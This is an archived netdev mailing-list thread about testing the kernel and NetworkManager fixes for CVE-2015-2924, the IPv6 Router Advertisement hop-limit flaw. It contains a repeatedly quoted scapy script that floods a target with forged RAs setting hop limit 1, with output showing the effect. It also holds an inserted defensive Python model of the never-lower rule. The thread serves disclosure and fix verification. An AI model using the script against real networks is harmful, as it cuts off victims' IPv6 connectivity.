Message ID | 20150401.154847.612566794393812348.davem@davemloft.net |
---|---|
State | Accepted, archived |
Delegated to: | David Miller |
On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote:
> D.S. Ljungmark (1):
>       ipv6: Don't reduce hop limit for an interface

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a

I was testing this change and apparently it doesn't close the hole.

The python script I use to send RAs:

#!/usr/bin/env python
import sys
import time
import scapy.all
from scapy.layers.inet6 import *
ip = IPv6()
# ip.dst = 'ff02::1'
ip.dst = sys.argv[1]
icmp = ICMPv6ND_RA()
icmp.chlim = 1
for x in range(10):
    send(ip/icmp)
    time.sleep(1)

# ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
.
Sent 1 packets.
...<10 times>...
Sent 1 packets.

After I do this, on the targeted machine I check hop_limits:

# for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
/proc/sys/net/ipv6/conf/all/hop_limit:64
/proc/sys/net/ipv6/conf/default/hop_limit:64
/proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
/proc/sys/net/ipv6/conf/lo/hop_limit:64
/proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64

As you see, the interface which received RAs still lowered
its hop_limit to 1. I take it means that the bug is still present
(right? I'm not a network guy...).

I triple-checked that I do run the kernel with the fix.
Further investigation shows that the code touched by the fix
is not even reached, hop_limit is changed elsewhere.

I'm willing to test additional patches.
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html

On 29/04/15 16:51, Denys Vlasenko wrote:
> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote:
>> D.S. Ljungmark (1):
>>       ipv6: Don't reduce hop limit for an interface
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
>
> I was testing this change and apparently it doesn't close the hole.
>
> The python script I use to send RAs:
>
> #!/usr/bin/env python
> import sys
> import time
> import scapy.all
> from scapy.layers.inet6 import *
> ip = IPv6()
> # ip.dst = 'ff02::1'
> ip.dst = sys.argv[1]
> icmp = ICMPv6ND_RA()
> icmp.chlim = 1
> for x in range(10):
>     send(ip/icmp)
>     time.sleep(1)
>
> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> .
> Sent 1 packets.
> ...<10 times>...
> Sent 1 packets.
>
> After I do this, on the targeted machine I check hop_limits:
>
> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> /proc/sys/net/ipv6/conf/all/hop_limit:64
> /proc/sys/net/ipv6/conf/default/hop_limit:64
> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
> /proc/sys/net/ipv6/conf/lo/hop_limit:64
> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
>
> As you see, the interface which received RAs still lowered
> its hop_limit to 1. I take it means that the bug is still present
> (right? I'm not a network guy...).

It might not be present in the _kernel_. Do you run NetworkManager on
your system? If so, see below.

>
> I triple-checked that I do run the kernel with the fix.
> Further investigation shows that the code touched by the fix
> is not even reached, hop_limit is changed elsewhere.
>
> I'm willing to test additional patches.

NetworkManager had its own re-implementation of the bug. It got fixed
with NetworkManager commit:

commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
Author: Thomas Haller <thaller@redhat.com>
Date:   Wed Apr 8 15:54:30 2015 +0200

    platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)

Before that commit, NetworkManager would take the RA packet, extract
the hop limit, and write it to the sysctl itself.

//D.S.
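
Added example (not part of the thread, and not the kernel's or NetworkManager's code): a Python model of the rule named in both commit subjects, never lowering the hop limit from an RA, next to the pre-fix behaviour described above. All function names and the sample RAs are constructed for illustration.

```python
import struct

# Fixed 16-byte part of an ICMPv6 Router Advertisement (RFC 4861): type, code,
# checksum, cur hop limit, flags, router lifetime, reachable time, retrans timer.
RA_HEADER = struct.Struct("!BBHBBHII")
ICMPV6_ROUTER_ADVERT = 134


def build_ra(cur_hop_limit):
    """Constructed sample RA; checksum left at 0 because it is not verified here."""
    return RA_HEADER.pack(ICMPV6_ROUTER_ADVERT, 0, 0, cur_hop_limit, 0, 1800, 0, 0)


def parse_ra_hop_limit(icmpv6):
    """Return the Cur Hop Limit field, or raise ValueError for anything else."""
    if len(icmpv6) < RA_HEADER.size:
        raise ValueError("truncated Router Advertisement")
    msg_type, code, _cksum, cur_hop_limit = RA_HEADER.unpack_from(icmpv6)[:4]
    if msg_type != ICMPV6_ROUTER_ADVERT or code != 0:
        raise ValueError("not a Router Advertisement")
    return cur_hop_limit


def legacy_hop_limit(current, advertised):
    """Pre-fix behaviour described in the thread: any non-zero value is applied."""
    return advertised if advertised else current


def hardened_hop_limit(current, advertised):
    """Never-lower rule: 0 means 'unspecified'; smaller values are ignored."""
    return advertised if advertised > current else current


def apply_ras(current, messages, policy):
    """Feed raw RAs through a policy; return (final hop limit, lowering attempts)."""
    lowering = []
    for raw in messages:
        try:
            advertised = parse_ra_hop_limit(raw)
        except ValueError:
            continue  # malformed input never touches the setting
        if 0 < advertised < current:
            lowering.append(advertised)
        current = policy(current, advertised)
    return current, lowering


# Constructed input: hop limits 128 and 0, one truncated message, then 1.
SAMPLE = [build_ra(128), build_ra(0), b"\x86\x00", build_ra(1)]
```

Starting from 64, the legacy policy ends at 1, as in the `enp0s25` output above, while the hardened policy ends at 128; the lowering attempts returned alongside are what a monitor would log.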

On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote:
> On 29/04/15 16:51, Denys Vlasenko wrote:
> > On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote:
> >> D.S. Ljungmark (1):
> >>       ipv6: Don't reduce hop limit for an interface
> >
> > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
> >
> > I was testing this change and apparently it doesn't close the hole.
> >
> > The python script I use to send RAs:
> >
> > #!/usr/bin/env python
> > import sys
> > import time
> > import scapy.all
> > from scapy.layers.inet6 import *
> > ip = IPv6()
> > # ip.dst = 'ff02::1'
> > ip.dst = sys.argv[1]
> > icmp = ICMPv6ND_RA()
> > icmp.chlim = 1
> > for x in range(10):
> >     send(ip/icmp)
> >     time.sleep(1)
> >
> > # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> > .
> > Sent 1 packets.
> > ...<10 times>...
> > Sent 1 packets.
> >
> > After I do this, on the targeted machine I check hop_limits:
> >
> > # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> > /proc/sys/net/ipv6/conf/all/hop_limit:64
> > /proc/sys/net/ipv6/conf/default/hop_limit:64
> > /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
> > /proc/sys/net/ipv6/conf/lo/hop_limit:64
> > /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
> >
> > As you see, the interface which received RAs still lowered
> > its hop_limit to 1. I take it means that the bug is still present
> > (right? I'm not a network guy...).
>
> It might not be present in the _kernel_. Do you run NetworkManager on
> your system? If so, see below.
>
> >
> > I triple-checked that I do run the kernel with the fix.
> > Further investigation shows that the code touched by the fix
> > is not even reached, hop_limit is changed elsewhere.
> >
> > I'm willing to test additional patches.
>
> NetworkManager had its own re-implementation of the bug. It got fixed
> with NetworkManager commit:
>
> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
> Author: Thomas Haller <thaller@redhat.com>
> Date:   Wed Apr 8 15:54:30 2015 +0200
>
>     platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
>
>
>
> Before that commit, NetworkManager would take the RA packet, extract
> the hop limit, and write it to the sysctl itself.

Yup, we basically followed the original kernel logic here, so we needed
to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and
obviously is in git master.

Dan

On 29/04/15 18:50, Dan Williams wrote:
> On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote:
>> On 29/04/15 16:51, Denys Vlasenko wrote:
>>> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote:
>>>> D.S. Ljungmark (1):
>>>>       ipv6: Don't reduce hop limit for an interface
>>>
>>> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
>>>
>>> I was testing this change and apparently it doesn't close the hole.
>>>
>>> The python script I use to send RAs:
>>>
>>> #!/usr/bin/env python
>>> import sys
>>> import time
>>> import scapy.all
>>> from scapy.layers.inet6 import *
>>> ip = IPv6()
>>> # ip.dst = 'ff02::1'
>>> ip.dst = sys.argv[1]
>>> icmp = ICMPv6ND_RA()
>>> icmp.chlim = 1
>>> for x in range(10):
>>>     send(ip/icmp)
>>>     time.sleep(1)
>>>
>>> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
>>> .
>>> Sent 1 packets.
>>> ...<10 times>...
>>> Sent 1 packets.
>>>
>>> After I do this, on the targeted machine I check hop_limits:
>>>
>>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
>>> /proc/sys/net/ipv6/conf/all/hop_limit:64
>>> /proc/sys/net/ipv6/conf/default/hop_limit:64
>>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
>>> /proc/sys/net/ipv6/conf/lo/hop_limit:64
>>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
>>>
>>> As you see, the interface which received RAs still lowered
>>> its hop_limit to 1. I take it means that the bug is still present
>>> (right? I'm not a network guy...).
>>
>> It might not be present in the _kernel_. Do you run NetworkManager on
>> your system? If so, see below.
>>
>>>
>>> I triple-checked that I do run the kernel with the fix.
>>> Further investigation shows that the code touched by the fix
>>> is not even reached, hop_limit is changed elsewhere.
>>>
>>> I'm willing to test additional patches.
>>
>> NetworkManager had its own re-implementation of the bug. It got fixed
>> with NetworkManager commit:
>>
>> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
>> Author: Thomas Haller <thaller@redhat.com>
>> Date:   Wed Apr 8 15:54:30 2015 +0200
>>
>>     platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
>>
>>
>>
>> Before that commit, NetworkManager would take the RA packet, extract
>> the hop limit, and write it to the sysctl itself.
>
> Yup, we basically followed the original kernel logic here, so we needed
> to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and
> obviously is in git master.
>

Are there any release announcements for NetworkManager? Or a place to
link for official releases/homepage?

//D.S.

On Wed, Apr 29, 2015 at 5:17 PM, D.S. Ljungmark <ljungmark@modio.se> wrote:
>
> On 29/04/15 16:51, Denys Vlasenko wrote:
>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
>> /proc/sys/net/ipv6/conf/all/hop_limit:64
>> /proc/sys/net/ipv6/conf/default/hop_limit:64
>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
>> /proc/sys/net/ipv6/conf/lo/hop_limit:64
>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
>>
>> As you see, the interface which received RAs still lowered
>> its hop_limit to 1. I take it means that the bug is still present
>> (right? I'm not a network guy...).
>
> It might not be present in the _kernel_. Do you run NetworkManager on
> your system? If so, see below.

Yes. "killall -STOP NetworkManager" and now I see that bug is fixed.
Sorry for the false alarm.

(If anyone would want to reproduce this, NB: be sure to also enable
accept_ra* sysctls, otherwise kernel will ignore RAs and bug wouldn't
be reproduced on previous kernels too).

On Wed, 2015-04-29 at 18:55 +0200, D.S. Ljungmark wrote:
>
> On 29/04/15 18:50, Dan Williams wrote:
> > On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote:
> >> On 29/04/15 16:51, Denys Vlasenko wrote:
> >>> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote:
> >>>> D.S. Ljungmark (1):
> >>>>       ipv6: Don't reduce hop limit for an interface
> >>>
> >>> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a
> >>>
> >>> I was testing this change and apparently it doesn't close the hole.
> >>>
> >>> The python script I use to send RAs:
> >>>
> >>> #!/usr/bin/env python
> >>> import sys
> >>> import time
> >>> import scapy.all
> >>> from scapy.layers.inet6 import *
> >>> ip = IPv6()
> >>> # ip.dst = 'ff02::1'
> >>> ip.dst = sys.argv[1]
> >>> icmp = ICMPv6ND_RA()
> >>> icmp.chlim = 1
> >>> for x in range(10):
> >>>     send(ip/icmp)
> >>>     time.sleep(1)
> >>>
> >>> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> >>> .
> >>> Sent 1 packets.
> >>> ...<10 times>...
> >>> Sent 1 packets.
> >>>
> >>> After I do this, on the targeted machine I check hop_limits:
> >>>
> >>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> >>> /proc/sys/net/ipv6/conf/all/hop_limit:64
> >>> /proc/sys/net/ipv6/conf/default/hop_limit:64
> >>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1    <=== THIS
> >>> /proc/sys/net/ipv6/conf/lo/hop_limit:64
> >>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64
> >>>
> >>> As you see, the interface which received RAs still lowered
> >>> its hop_limit to 1. I take it means that the bug is still present
> >>> (right? I'm not a network guy...).
> >>
> >> It might not be present in the _kernel_. Do you run NetworkManager on
> >> your system? If so, see below.
> >>
> >>>
> >>> I triple-checked that I do run the kernel with the fix.
> >>> Further investigation shows that the code touched by the fix
> >>> is not even reached, hop_limit is changed elsewhere.
> >>>
> >>> I'm willing to test additional patches.
> >>
> >> NetworkManager had its own re-implementation of the bug. It got fixed
> >> with NetworkManager commit:
> >>
> >> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f
> >> Author: Thomas Haller <thaller@redhat.com>
> >> Date:   Wed Apr 8 15:54:30 2015 +0200
> >>
> >>     platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
> >>
> >>
> >>
> >> Before that commit, NetworkManager would take the RA packet, extract
> >> the hop limit, and write it to the sysctl itself.
> >
> > Yup, we basically followed the original kernel logic here, so we needed
> > to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and
> > obviously is in git master.
> >
>
> Are there any release announcements for NetworkManager? Or a place to
> link for official releases/homepage?

The mailing list:

https://mail.gnome.org/mailman/listinfo/networkmanager-list

The project site:

https://wiki.gnome.org/Projects/NetworkManager

Dan